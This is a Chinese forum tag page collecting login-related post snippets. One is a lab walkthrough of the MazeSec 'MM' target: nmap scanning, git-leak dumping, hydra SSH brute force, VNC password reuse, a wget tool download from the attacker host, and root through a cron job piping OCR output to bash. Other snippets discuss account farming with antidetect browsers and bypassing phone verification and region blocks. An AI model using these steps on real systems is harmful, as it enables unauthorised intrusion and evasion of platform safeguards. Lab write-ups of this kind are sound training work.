/tag/login

如题 首页： https://www.ccopyright.com.cn/ 登录页面： https://register.ccopyright.com.cn/login.html 为什么我登录不了呢？网页进去是空白的。 F12看了一下显示，这两个资源502 https://static.ccopyright.com.cn/js/common.js https://static.ccopyright.com.cn/js/browser.js 4 个帖子 - 4 位参与者 阅读完整话题

报错登录失败：Login server error: Token exchange failed: token endpoint returned status 403 Forbidden: Country, region, or territory not supported 2 个帖子 - 2 位参与者 阅读完整话题

Login server error: Token exchange failed: error sending request for url ( https://auth.openai.com/oauth/token )没招了，全局也开了，tun也开了，就是登陆不了 1 个帖子 - 1 位参与者 阅读完整话题

手上的几十个team号全都不让用 都让重新 login again 天塌了 2 个帖子 - 2 位参与者 阅读完整话题

Roxy，GoLogin，Adspower都用来一遍，想再试试MultiLogin，但这货不免费试用，必须充值。有用过的大佬说下么？ 主要想体验下找个适合自己的充值长期用。主要是保持ip干净，养号用，尽量保证各种账号不被封，偶尔爬虫玩玩。不搞什么自动化，也不搞跨区电商管理啥的。 纯个人用。 求大佬分享心得 ！ 1 个帖子 - 1 位参与者 阅读完整话题

免费获取10,000个Figma制作积分 Figma Login | Figma 不存在aff哈。看到了消息，我就帮大家收集来了。如果有领取或者失效的佬和我说一下，免得失效了误导， 9 个帖子 - 9 位参与者 阅读完整话题

（话题已被作者删除） 1 个帖子 - 1 位参与者 阅读完整话题

我在 http://developers.facebook.com/创建了一个 app ，想实现通过 instagram 登录，但是在 app settings >> Advanced 中设置了 Authorize callback URL ，保存之后刷新还是空的，请教下如何配置才能生效呢

https://jiasu118.top/login/s/8aa8fa9e04b8e2575417229372720444 每个月300G来着，忘了是啥时候买的了，应该还有几个月，希望能帮助到有需要的佬友。 直接放到clash配置的url里就好 1 个帖子 - 1 位参与者 阅读完整话题

靶机来自 MazeSec（迷踪安全）： MazeSec | About 靶机名：MM 作者 ：dsz AI总结 今天复盘一下MM靶机。 为了防止有新手不知道打靶机的流程，这次从部署环境开始。（因为我一开始是打ctf的，第一次打靶机还真不知道怎么开始） 环境搭建 本次教程都以MazeSec自制靶机举例，其他的都万变不离其宗。 我们首先下载好靶机环境文件，一般都是一个ova文件。全称：Open Virtualization Appliance（开放虚拟化设备） 其中包括了完整配置信息和虚拟磁盘数据（也就是打开即用的虚拟机，基本不需要在配置，除了网络之类的） 拿到靶机后我们用 VirtualBox 打开（MazeSec的靶机优先支持 VirtualBox ， VMware 有可能会有找不到网卡的情况） 我们依次点击：管理—>导入虚拟电脑—>选择文件（需要的靶机ova文件） 我们可以选择改一下位置，我改成了D盘里自建的文件夹。 然后点击完成。等待导入完全（右上角有进度条） 导入后右边可以看到配置详情，我们几乎不要去管，但是有时候会碰到没有找到ip的情况，我们看一看网络设置对不对。这里建议直接选择桥接，特别是对于 VMware 上部署kali的师傅，两个平台的nat网段是不同的（如果你是网络高手或许可以自己去调一下，相关密码需要进入社区获取 ） 然后双击即可打开靶机。我们打开可能会遇到如下报错，不要管他，点一下更改网络设置然后点确定退出就好了。 信息收集 打开靶机后我们就不要管他了(也可以看，我是为了尽量模拟真实环境) 回到我们的攻击机（kali等），注意kali也要桥接哦~ 我们nmap起手收集一下目标ip $ nmap 172.20.10.0/24 -sn #-sn是只发ping包扫描 找到VirtuaBox的网卡就是靶机地址了。 ip： 172.20.10.3 然后在扫一下端口开放情况。 $ nmap -p- 172.20.10.3 #-p-代表扫描全端口 开放 22 、 80 、 5901 、 6001 四个端口。 vnc复盘 VNC 是一种让你用一台电脑（客户端）远程操作另一台电脑（服务器）桌面的技术 5901/tcp ：VNC 服务的主端口 大门 ，你从这里连接进去| 6001/tcp ：X11 服务端口（Linux图形底层） 内部管道 ，服务器自己用的，你不需要管它| :1 ：（显示编号）这是第1号图形会话 如果同时开多个桌面，就是 :1 、 :2 …| 连接命令： vncviewer 172.20.10.3:5901 就和22端口的ssh一样，但是这里突然开始一个vnc也很不正常，需要留意一下。 和ssh一样有可能被暴力破解的可能 初步渗透测试-获取user-shell 我们一般有web的话就先去web看看，因为web的洞会简单一点。 一个静态页面，没思路，那么就去扫一下目录。 $ dirsearch -u 172.20.10.3 看到泄露了很多git文件，那么就是git泄露，我们用工具扒下来看看。 root@JYlover:~/webtool/GitHacker# githacker --url http://172.20.10.3/.git/ --output-folder result 看到有几次提交记录，我们能得到一个域名 mm.dsz 这里我尝试添加一个hosts记录，果然访问到一个登录页面。 不能输入和点击，尝试修改前端代码，但是最后发现完全没有用，就是一个壳子。那这条路就断了。 注意，这里由于环境变化，下面的ip和上面不一样，大家自行理解一下。 于是我们只能再次回到git。 我把几次的git记录都看了一遍，发现过程中添加又删除了一个密码 sublarge 。 尝试用它登录ssh或者vnc，但是都不对。 那没办法，git里也没有什么信息了（4次提交都看过了） 那就只剩下爆破这条路了。我们hydra试试。 ┌──(kali㉿JYlover)-[~] └─$ hydra -l mingmingjiu -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.103 -t 4 -e nsr 这里添加 -e nsr 参数测试了弱密码，没想到果然就是用户名复用。 那我们尝试ssh登录。 ┌──(kali㉿JYlover)-[~] └─$ ssh [email protected] #password:mingmingjiu 但是发现登陆成功却直接退出。 原因是该用户的shell被禁用，但是密码是正确的。 既然shell被禁用了，我们可以想到，这里留一个vnc是做什么的，是否存在密码复用问题呢，尝试登录。 ┌──(kali㉿JYlover)-[~] └─$ vncviewer 192.168.56.103:5901 # password:mingmingjiu 成果登录上了vnc桌面。 权限提升-获取root-shell 我们现在是没有shell权限的，那么怎么办呢，这里有一个办法是用其他终端， xterm 然后这里就直接弹了一个shell回来，做权限维持 关于shell权限复盘 这里为什么我们不能ssh登录，也不能直接用terminal，但是用xterm这些古老的终端却可以。 我们先看一下用户信息： mingmingjiu@MM:~$ cat /etc/passwd 能看到mingmingjiu用户的默认shell是 /usr/sbin/nologin 我们ssh登录时：验证成功后，系统会尝试启动你在 /etc/passwd 中定义的 Shell（例如 /bin/bash） 如果定义的是 /usr/sbin/nologin ，系统就会运行这个程序，它会打印一段文字（通常是 “This account is currently not available.”），然后直接断开连接。 而自带terminal也是直接去打开默认shell，但是这里默认shell是 nologin 。 而古老的 xterm ，他不知道去主动找用户默认shell，而是呆呆的直接启动一个sh 所以他没有收到/etc/passwd的影响。 得到shell之后我们就尝试去权限提升了。 我们传一个pspy64到靶机（这是一个监控程序，会一直监控当前的进程，主要是发现一些存在的定时任务等） 这里可能有些刚接触靶机的师傅会不知道，一般我们打靶机会自备一些常用的工具箱，里面有一些什么漏洞扫描，进程监控等等工具，到了提权的时候可以把工具传上去帮助我们信息收集。例如： 这里就是我的工具箱，获得低权限shell时起http服务传一些工具上去。然后靶机上下载下来直接监控： mingmingjiu@MM:~$ wget 192.168.56.1:8888/pspy64 就不全部截图了，有点长，大家明白意思就好了。 然后我们直接pspy监控进程： mingmingjiu@MM:~$ chmod +x pspy64 chmod +x pspy64 mingmingjiu@MM:~$ ./pspy64 明显能看到有些程序在重复执行，而且还是以root身份执行的（UID=0），说明很有可能是作者留给我们的提权点。 能注意到其中有一个 /bin/sh -c /bin/bash /opt/a.sh 一直作为定时任务在执行，后面应该就是它里面执行的命令了。 我们去看看这个文件。 mingmingjiu@MM:~$ cat /opt/a.sh 是bash执行gocr后的结果，这个gocr是什么，我们可以去问一下ai。 很简单，就是把图片里面的文本识别出来。OCR模型就是这个作用。 也就是说如果我们有一张图片 1.png , 里面写着id 然后我们执行gocr ./1.png | bash 就会输出id命令的结果。 那么就很简单了，也就是说只要我们把 /tmp/go.png 换成我们自制的命令图片，然后等定时任务执行。那就可以以root身份执行任意命令了。达到定时任务提权的目的。 总结 总结一下这次靶机接触到的一些知识吧。 vnc是一种和ssh类似的连接远程桌面的技术，通过命令连接 vncviewer <ip>:<port> 当 /etc/passwd 中给用户默认shell指定为 /usr/sbin/nologin 时会导致ssh，以及现代的终端模拟器失效。此时可以使用一些古老的终端如 xterm 等直接起一个终端，而不是走默认终端。 可以通过工具等，多注意定时任务的执行 2 个帖子 - 2 位参与者 阅读完整话题

登录这玩意好像必须得开tun 我服务器端auth login进去一直在signing in codex排查下来发现Cloudcode-pa.googleapis.com还是走直连 9 个帖子 - 5 位参与者 阅读完整话题

claude install 2.1.154 即可 Last login: Fri May 29 00:39:00 on ttys000 sky@BlueSkyXN-MacBook-Air-M4 ~ % claude ▐▛███▜▌ Claude Code v2.1.153 ▝▜█████▛▘ Opus 4.7 with high effort · Claude Pro ▘▘ ▝▝ /Users/sky Using Opus 4.7 (from .claude/settings.json) · /model to change ──────────────────────────────────────────────────────────────────────────────── ❯ ──────────────────────────────────────────────────────────────────────────────── Press Ctrl-C again to exit ● high · /effort 30 个帖子 - 17 位参与者 阅读完整话题

NVIDIA DSX Air登录后一直在登录退出之间反复跳转 一直在/simulations和/login之间反复跳转 佬友们有没有遇到过这种情况呢? 2 个帖子 - 2 位参与者 阅读完整话题

2026年5月最新Multilogin优惠信息显示，可用的优惠码包括 MEGA50 (最高50%折扣)、 ADBNEW50 (浏览器50%折扣) 和 AFF5025 。此外，用户可享受30天30%的Webshare代理带宽折扣。 主要优惠活动整理 长期折扣/优惠码 MEGA50 : 根据Reddit和相关论坛，此码可能提供最高50%的折扣。 ADBNEW50 : 针对浏览器的50%优惠码。 AFF5025 : 50%折扣优惠券。 SAVE50 : 云手机服务50%优惠码。 专属优惠与捆绑 Webshare : 提供首月30%折扣以及高达40GB的免费代理带宽。 MyPrivateProxy : 与Multilogin合作，提供首月50%的折扣。 官方优惠活动 试用优惠 : 官方有时提供€1.99体验3天完整功能的活动。 • • 推荐计划 : 推荐新用户可获得每人€10的奖励（Multipoints），可用于抵扣下一次支付。 Multilogin Multilogin | Pricing Explore Multilogin pricing for cloud phones and browser profiles. Start from €1.99, scale easily, and manage multiple accounts without risk. Est. reading time: 7 minutes 1.99欧3天试用，使用折扣码1欧3天试用 套餐包含5个配置环境（云手机+浏览器），200M内置流量（全球主流国家住宅家宽静态/动态IP）1小时云手机使用时间（云手机首次开机建议用自己搭的socks5，谷歌商店安装APP特耗流量，我第一用50多分钟开了5个云手机安装APP耗光了5GB流量，内置流量包特贵） 浏览器选择快捷方式，打开省流开关，200M流量足够开10+个母号了。 订阅国际版com，不要订阅中国版org,中国版没有App，只有网页。 4 个帖子 - 3 位参与者 阅读完整话题

有个账号无效了。今天试着重新通过 OAuth Login授权，一切都正常，最终web页面也显示了： Authentication successful! 但是在CPA中却失败，提示：Authentication failed: Failed to exchange authorization code for tokens 请问可能是什么原因，CPA已经更新到了7.0.2版本。 再补充一个之前已经添加的free号现在都好像超时了，刷不到配额。 2 个帖子 - 1 位参与者 阅读完整话题

报错如下： 在站内搜索过了确实没见过相关报错 Please run /login . API Error: 403 {“error”:{“type”:“”,“message”:"daily discord check-in required; run /checkin in the server tounlock your key for today 情况如下： 自建CPA接入new api 单独使用CPA接口并不会报错，是给同事使用时出现的上述报错 已开启请求透传，已关闭newapi站点签到功能 可能是因为调了什么不知道的newapi功能吗..求佬解答 1 个帖子 - 1 位参与者 阅读完整话题

（话题已被作者删除） 1 个帖子 - 1 位参与者 阅读完整话题

更新codex后直接不能登陆了，都没到授权这一步：Sign-in failed: ChatGPT login is disabled. Use API key login instead. 3 个帖子 - 1 位参与者 阅读完整话题

做了个小工具叫 noni ，开源在 GitHub： https://github.com/williamwa/noni 解决什么问题 gh auth login 、 ssh-copy-id 、 npm publish 、 npm login 这些命令默认是交互式的，默认有一个 Terminal, 是人坐在终端前面：选 GitHub.com 还是 Enterprise 、按 y/n 、粘贴 token 、输入密码…… 放到 AI agent 场景就很尴尬：agent 在 sandbox 里跑 bash/exec ，碰到这种交互，agent 直接卡住。常见的 workaround： 翻文档找有没有 --non-interactive flag （很多没有） 用 expect 写脚本（脆弱、每个 CLI 重写一次） 让 agent 自己驱动 PTY （要它处理 ANSI 转义、终端尺寸、ECHO 检测，太重） noni 的思路是把这件事变成 一系列无状态 RPC 调用 ： agent: noni run "gh auth login" noni: {id: abc, status: waiting_input, prompt: {type: select, options: [...]}} agent: noni key abc enter noni: {id: abc, status: waiting_input, prompt: {type: yesno, default: "y"}} agent: noni input abc Y noni: {id: abc, status: waiting_input, prompt: {type: password, echo: false}} agent: noni secret abc --env GH_TOKEN noni: {id: abc, status: exited, exit_code: 0} agent 看到的是结构化的 prompt ，也可以用 read --raw 来读这屏幕，然后自己决定下一步发什么。这样整个工具调用流程不会卡住。 几个设计细节 prompt 类型 靠几个不同信号判断： password ：termios ECHO 关掉了（最硬的信号，置信度 0.99 ） yesno ：识别 (y/n) [Y/n] 等模式，从大写字母抽 default select ：找 > ❯ * 标记 + 缩进选项块 input ：行尾 : ? > unknown ：1s idle 还匹配不上就 fallback ，让 agent 看 screen 自己判断 noni secret --env VAR —— token 不走 RPC wire 。读的是 daemon 进程 的环境变量，所以不会出现在 agent 的 prompt / 日志 / context 里。这是协议层的硬保障，不是约定。 架构 是 stateless CLI + 常驻 daemon： noni (CLI) ──JSON-RPC over Unix socket──▶ nonid (daemon) ──PTY──▶ child socket 在 $XDG_RUNTIME_DIR/noni/sock ，0600 。daemon 由 CLI 首次调用时自动 spawn 。 终端模拟用 hinshun/vt10x ，detector 看的是"稳定后的虚拟屏幕"而不是原始字节流，避免被光标移动 / 重绘干扰。 实测 让 agent 在容器里跑 gh auth login 整个 device flow 是能走通的（用户授权那一步还是要人）。完整一次跑下来 14 个 RPC 调用，包括 3 次 select （ host / protocol / method ）、1 次 yesno （是否用 git credentials ）、最后 enter 等待 device 授权完成。 安装 brew install williamwa/tap/noni # 或 go install github.com/williamwa/noni/cmd/noni@latest go install github.com/williamwa/noni/cmd/nonid@latest Linux 主测，macOS 能跑。 Go 单文件，无运行时依赖。还在 v0.1.0-dev ，欢迎拍砖 / issue / PR： 👉 https://github.com/williamwa/noni

如图，今天重新codex login登录发现需要手机号验证了，有没有佬友遇到同样情况啊，这能绕开吗 13 个帖子 - 9 位参与者 阅读完整话题